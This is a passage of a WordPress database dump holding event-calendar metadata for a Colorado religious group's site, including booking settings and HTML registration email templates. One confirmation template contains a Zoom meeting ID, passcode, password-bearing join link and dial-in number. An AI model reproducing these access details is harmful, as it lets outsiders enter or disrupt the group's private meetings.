es_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(187021,268751,'mec_tickets','a:0:{}'),(187022,268751,'mec_fees_global_inheritance','1'),(187023,268751,'mec_fees','a:0:{}'),(187024,268751,'mec_ticket_variations_global_inheritance','1'),(187025,268751,'mec_ticket_variations','a:0:{}'),(187026,268751,'mec_reg_fields_global_inheritance','1'),(187027,268751,'mec_reg_fields','a:0:{}'),(187028,268751,'mec_bfixed_fields','a:0:{}'),(187029,268751,'mec_op','a:0:{}'),(187030,268751,'mec_fields','a:0:{}'),(187031,268751,'mec_event_status','EventScheduled'),(187032,268751,'mec_moved_online_link',''),(187033,268751,'mec_cancelled_reason',''),(187034,268751,'mec_display_cancellation_reason_in_single_page',''),(187035,268751,'boldgrid_hide_page_title','0'),(187036,268751,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(187037,268751,'passster_activate_global_protection',NULL),(187038,268751,'passster_activate_protection',NULL),(187039,268751,'passster_protection_type','password'),(187040,268751,'boldgrid_in_page_containers','1'),(187054,268751,'_dp_original','267696'),(187042,268751,'passster_area_shortcode',''),(187043,268751,'_wp_old_date','2023-01-14'),(187044,268751,'mec_cost_auto_calculate','0'),(187045,268751,'mec_style_per_event','global'),(187046,268751,'mec_trailer_url',''),(187047,268751,'mec_trailer_title',''),(187048,268751,'mec_start_datetime','2023-07-12 10:30 AM'),(187049,268751,'mec_end_datetime','2023-07-12 11:30 AM'),(187050,268751,'mec_sequence','4'),(187051,268751,'mec_event_gallery','a:0:{}'),(187052,268751,'mec_related_events','a:0:{}'),(187053,268751,'mec_banner','a:0:{}'),(187055,268751,'_edit_lock','1693499669:2'),(187056,268751,'_edit_last','2'),(187057,268751,'_thumbnail_id','268151'),(187058,268752,'mec_color',''),(187059,268752,'mec_location_id','185'),(187060,268752,'mec_dont_show_map','0'),(187061,268752,'mec_organizer_id','1'),(187062,268752,'mec_read_more',''),(187063,268752,'mec_more_info',''),(187064,268752,'mec_more_info_title',''),(187065,268752,'mec_more_info_target','_self'),(187066,268752,'mec_cost',''),(187067,268752,'mec_currency','a:0:{}'),(187068,268752,'mec_additional_organizer_ids','a:0:{}'),(187069,268752,'mec_additional_location_ids','a:0:{}'),(187070,268752,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-07-23\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-07-23\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(187071,268752,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(187072,268752,'mec_certain_weekdays','a:0:{}'),(187073,268752,'mec_allday','0'),(187074,268752,'one_occurrence','0'),(187075,268752,'mec_hide_time','0'),(187076,268752,'mec_hide_end_time','0'),(187077,268752,'mec_comment',''),(187078,268752,'mec_timezone','global'),(187079,268752,'mec_countdown_method','global'),(187080,268752,'mec_public','1'),(187081,268752,'mec_start_date','2023-07-23'),(187082,268752,'mec_start_time_hour','10'),(187083,268752,'mec_start_time_minutes','30'),(187084,268752,'mec_start_time_ampm','AM'),(187085,268752,'mec_start_day_seconds','37800'),(187086,268752,'mec_end_date','2023-07-23'),(187087,268752,'mec_end_time_hour','11'),(187088,268752,'mec_end_time_minutes','30'),(187089,268752,'mec_end_time_ampm','AM'),(187090,268752,'mec_end_day_seconds','41400'),(187091,268752,'mec_repeat_status','0'),(187092,268752,'mec_repeat_type',''),(187093,268752,'mec_repeat_interval','1'),(187094,268752,'mec_repeat_end',''),(187095,268752,'mec_repeat_end_at_occurrences',''),(187096,268752,'mec_repeat_end_at_date',''),(187097,268752,'mec_advanced_days','a:0:{}'),(187098,268752,'mec_in_days',''),(187099,268752,'mec_not_in_days',''),(187100,268752,'mec_hourly_schedules','a:0:{}'),(187101,268752,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(187102,268752,'mec_tickets','a:0:{}'),(187140,268753,'protect_children',''),(187141,268753,'mec_color',''),(187142,268753,'mec_location_id','118'),(187143,268753,'mec_dont_show_map','0'),(187144,268753,'mec_organizer_id','1'),(187145,268753,'mec_read_more',''),(187146,268753,'mec_more_info',''),(187147,268753,'mec_more_info_title',''),(187148,268753,'mec_more_info_target','_self'),(187149,268753,'mec_cost',''),(187150,268753,'mec_currency','a:0:{}'),(187103,268752,'mec_fees_global_inheritance','1'),(187104,268752,'mec_fees','a:0:{}'),(187105,268752,'mec_ticket_variations_global_inheritance','1'),(187106,268752,'mec_ticket_variations','a:0:{}'),(187107,268752,'mec_reg_fields_global_inheritance','1'),(187108,268752,'mec_reg_fields','a:0:{}'),(187109,268752,'mec_bfixed_fields','a:0:{}'),(187110,268752,'mec_op','a:0:{}'),(187111,268752,'mec_fields','a:0:{}'),(187112,268752,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:10264:\"<table id=\"u_body\" style=\"border-collapse: collapse; table-layout: fixed; border-spacing: 0; mso-table-lspace: 0pt; mso-table-rspace: 0pt; vertical-align: top; min-width: 320px; margin: 0 auto; background-color: #f1f1f1; width: 100%;\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr style=\"vertical-align: top;\">\r\n<td style=\"word-break: break-word; border-collapse: collapse !important; vertical-align: top;\">\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"height: 100%; width: 100% !important;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding-right: 0px; padding-left: 0px;\" align=\"center\"><img style=\"outline: none; text-decoration: none; -ms-interpolation-mode: bicubic; clear: both; display: inline-block !important; border: none; height: auto; float: none; width: 100%; max-width: 480px;\" title=\"\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"480\" align=\"middle\" border=\"0\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div style=\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-size: 28px; font-weight: bold; color: #f28a27;\">\r\n<p><span style=\"font-size: 20pt; font-weight: bold;\">Event Registration Confirmation</span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 1px solid #CCC;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 17px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 26px; font-size: 16px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 24px; color: #f28a27; font-weight: 600;\">Zoom Login Information:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\"><b>Meeting ID: </b>891 2510 3432<br />\r\n<b>Passcode:</b> 162109</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 15px;\"><a href=\"https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09\">https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\">See you there!</p>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #e8e8e8; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div>\r\n<p style=\"padding: 20px; font-size: 16px; line-height: 22px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #6e6e6e; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div style=\"text-align: center; font-family: arial, helvetica, sans-serif;\"><a href=\"https://www.facebook.com/people/Eckankar-in-Colorado/100067829705562/\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /></a>\r\n<p style=\"text-align: center; font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado<br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:8368:\"<table id=\"u_body\" style=\"border-collapse: collapse; table-layout: fixed; border-spacing: 0; mso-table-lspace: 0pt; mso-table-rspace: 0pt; vertical-align: top; min-width: 320px; margin: 0 auto; background-color: #f1f1f1; width: 100%;\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr style=\"vertical-align: top;\">\r\n<td style=\"word-break: break-word; border-collapse: collapse !important; vertical-align: top;\">\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"height: 100%; width: 100% !important;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border: 0px solid transparent;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif; background-color: #efefef;\" align=\"left\">\r\n<div>\r\n<div style=\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-size: 28px; font-weight: bold; color: #f28a27;\">\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px;\">Admin Notification</span></div>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 1px solid #CCC;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div style=\"text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n<div style=\"text-align: center;\"><br />\r\n<span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span>\r\n<p> <span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></p>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #e8e8e8; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div>\r\n<p style=\"padding: 20px; font-size: 16px; line-height: 22px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\"><span style=\"font-size: 14pt;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #6e6e6e; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div style=\"text-align: center; font-family: arial, helvetica, sans-serif;\"><a href=\"https://www.facebook.com/people/Eckankar-in-Colorado/100067829705562/\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /></a>\r\n<p style=\"text-align: center; font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado<br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\";}}'),(187113,268752,'mec_event_status','EventScheduled'),(187114,268752,'mec_moved_online_link',''),(187115,268752,'mec_cancelled_reason',''),(187116,268752,'mec_display_cancellation_reason_in_single_page',''),(187117,268752,'protect_children',''),(187118,268752,'passster_activate_global_protection',NULL),(187119,268752,'passster_activate_protection',NULL),(187120,268752,'passster_protection_type','password'),(187121,268752,'boldgrid_hide_page_title','0'),(187122,268752,'_thumbnail_id','268449'),(187123,268752,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(187124,268752,'boldgrid_in_page_containers','1'),(187125,268752,'passster_area_shortcode',''),(187126,268752,'mec_cost_auto_calculate','0'),(187127,268752,'mec_style_per_event','global'),(187128,268752,'mec_trailer_url',''),(187129,268752,'mec_trailer_title',''),(187130,268752,'mec_start_datetime','2023-07-23 10:30 AM'),(187131,268752,'mec_end_datetime','2023-07-23 11:30 